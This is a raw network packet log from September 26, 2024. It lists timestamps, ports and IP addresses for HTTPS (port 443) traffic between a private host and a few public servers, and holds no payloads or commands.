Sep 26, 2024 17:55:30.160664082 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.160732985 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.160737991 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.160787106 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.160834074 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.160840034 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.162445068 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.162476063 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.162503958 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.162504911 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.162516117 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.162544966 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.162676096 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.162729025 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.162734985 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.162909031 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.164527893 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.164561987 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.164581060 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.164587975 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.164592028 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.164628983 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.164643049 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.164643049 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.164650917 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.164659977 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.164699078 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.164838076 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.164890051 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.164896011 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.166197062 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.166224957 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.166245937 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.166253090 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.166295052 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.166727066 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.166769981 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.166775942 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.166819096 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.166825056 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.167454004 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.167499065 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.167505026 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.167686939 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.167716980 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.167732954 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.167737961 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.167795897 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.167799950 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.167896986 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.167933941 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.167948961 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.167953968 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.167994022 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.168175936 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.168220043 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.168224096 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.170280933 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.170289040 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.170331001 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.170336008 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.170398951 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.170413017 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.170443058 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.170449018 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.170479059 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.171422958 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.171456099 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.171466112 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.171471119 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.171514988 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.171519041 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.171550035 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.171591997 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.171597958 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.171767950 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.171780109 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.174282074 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.174323082 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.174328089 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.174371004 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.174408913 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.174416065 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.174421072 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.174459934 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.174464941 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.178494930 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.178530931 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.178560019 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.178564072 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.178571939 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.178632975 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.178704977 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.178754091 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.178817987 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.183442116 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.183485985 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.183566093 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.183748960 CEST	49783	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.183758974 CEST	443	49783	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.183936119 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.183971882 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.184001923 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.184004068 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.184012890 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.184041977 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.184146881 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.184195995 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.184201956 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.190412998 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.190481901 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.190490961 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.190613985 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.190649986 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.190659046 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.190664053 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.190709114 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.190713882 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.193466902 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.193517923 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.193525076 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.193680048 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.193711042 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.193726063 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.193732023 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.193769932 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.198842049 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.198904037 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.198941946 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.198961973 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.198967934 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.199012041 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.199017048 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.217494965 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.217531919 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.217576027 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.217587948 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.217641115 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.217641115 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.217652082 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.217694044 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.217699051 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.239443064 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:30.239501953 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:30.239609003 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:30.240698099 CEST	49784	443	192.168.2.16	52.165.165.26
Sep 26, 2024 17:55:30.240714073 CEST	443	49784	52.165.165.26	192.168.2.16
Sep 26, 2024 17:55:30.242305040 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.242348909 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.242367983 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.242376089 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.242417097 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.242422104 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.242497921 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.242528915 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.242539883 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.242543936 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.242583990 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.285368919 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.285427094 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.285455942 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.285489082 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.285501003 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.285541058 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.285548925 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.294725895 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.294790030 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.294795990 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.295037985 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.295068979 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.295093060 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.295097113 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.295130014 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.295152903 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.295159101 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.295206070 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.296745062 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.296921015 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.296948910 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.296978951 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.296984911 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.297013998 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.297025919 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.297029972 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.297079086 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.298547983 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.298608065 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.298654079 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.298659086 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.298788071 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.298815012 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.298831940 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.298839092 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.298883915 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.300131083 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300246000 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300291061 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.300297976 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300380945 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300426006 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.300431967 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300563097 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300595045 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300605059 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.300610065 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300657988 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.300663948 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300911903 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.300966978 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.300972939 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.302921057 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.302948952 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.302993059 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.303004026 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303050995 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.303056955 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303102970 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303165913 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.303172112 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303253889 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303288937 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303296089 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.303301096 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303345919 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303345919 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.303356886 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.303411007 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.303416967 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.305840015 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.305870056 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.305896044 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.305896997 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.305907011 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.305936098 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.306291103 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.306335926 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.306341887 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.325371981 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.325442076 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.325448990 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.325484037 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.325512886 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.325524092 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.325529099 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.325567961 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.325584888 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.326486111 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.326525927 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.326590061 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.326940060 CEST	49785	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.326955080 CEST	443	49785	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.327424049 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.327471972 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.327486992 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.327492952 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.327522039 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.327538013 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.327542067 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.327586889 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.327644110 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.327750921 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.327759981 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.327819109 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.328002930 CEST	49786	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.328016043 CEST	443	49786	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.330327988 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330374956 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.330380917 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330450058 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330482006 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330502987 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.330503941 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330512047 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330543995 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.330733061 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.330741882 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330753088 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.330789089 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.330815077 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.368784904 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.368832111 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.368911982 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.369117975 CEST	49787	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.369133949 CEST	443	49787	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.404114008 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.404156923 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.404225111 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.404263020 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.404434919 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.404496908 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.405615091 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.405652046 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.405669928 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.405703068 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.480628967 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.480680943 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.480808973 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.481031895 CEST	49788	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.481049061 CEST	443	49788	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.685904026 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.686814070 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.686830997 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.687170982 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.687479973 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.687546015 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.687628984 CEST	49775	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.687657118 CEST	443	49775	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.759808064 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.760035038 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.760056019 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.760499001 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.760793924 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.760859013 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.760909081 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.760936022 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.801520109 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.813118935 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.814018011 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.814049959 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.815334082 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.815418959 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.818027020 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.818077087 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.818240881 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.818316936 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.818366051 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.836901903 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.837165117 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.837179899 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.837493896 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.837908983 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.837964058 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.838042974 CEST	49782	443	192.168.2.16	142.250.186.132
